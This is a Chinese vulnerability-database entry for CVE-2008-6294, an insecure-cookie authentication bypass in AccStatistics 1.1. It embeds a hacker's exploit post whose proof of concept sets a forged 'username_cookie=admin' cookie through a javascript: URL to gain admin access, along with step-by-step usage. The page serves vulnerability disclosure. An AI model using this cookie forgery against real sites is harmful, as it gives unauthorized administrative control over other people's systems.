Acc Scripts Statistics 'admin/Index.php'权限绕过漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1183564 漏洞类型 权限许可和访问控制
发布时间 2009-02-26 更新时间 2009-03-13
CVE编号 CVE-2008-6294 CNNVD-ID CNNVD-200902-589
漏洞平台 N/A CVSS评分 7.5
|漏洞来源
https://cxsecurity.com/issue/WLB-2009030076
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200902-589
|漏洞详情
AccStatisticsis一个免费的网站统计脚本。AccStatistics可以告诉你的访问者是如何找到你以及访问网站的访客人数。AccStatistics1.1版本的admin/Index.php允许远程攻击者通过username_cookiecookie到"admin",以绕过权限并获得管理访问权。
|漏洞EXP
###########################################################################
______ __ __ ______ __ ______
/ ____/___ \ \/ / / ____/___ ____/ /__ __________ /_ __/__ ____ _____ ___
/ __/ / __ `/\ / / / / __ \/ __ / _ \/ ___/ ___/ / / / _ \/ __ `/ __ `__ \
/ /___/ /_/ / / / / /___/ /_/ / /_/ / __/ / (__ ) / / / __/ /_/ / / / / / /
/_____/\__, / /_/ \____/\____/\__,_/\___/_/ /____/ /_/ \___/\__,_/_/ /_/ /_/
/____/

# [~] Discovered by : Hakxer
# [~] Type Gap : AccStatistics v1.1 Insecure Cookie Handling
# [~] Script : http://www.accscripts.com/accstatistics.html
# [~] Greetz : Allah .. " Allah AkBar .. " Big Hacking SoOoN
##########################################################################

Bug In : /admin/Index.php

PoC : javascript:document.cookie="username_cookie=admin";

[~] Admin panel
http://www.accstatistics.com/demo/index.php
[~] Execute JS Code javascript:document.cookie="username_cookie=admin";
[~] Refresh


# Proud To be a Muslim #
#_=END=_#

|参考资料

来源:XF
名称:accstatistics-index-security-bypass(46292)
链接:http://xforce.iss.net/xforce/xfdb/46292
来源:BID
名称:32078
链接:http://www.securityfocus.com/bid/32078
来源:MILW0RM
名称:6965
链接:http://www.milw0rm.com/exploits/6965
来源:SECUNIA
名称:32517
链接:http://secunia.com/advisories/32517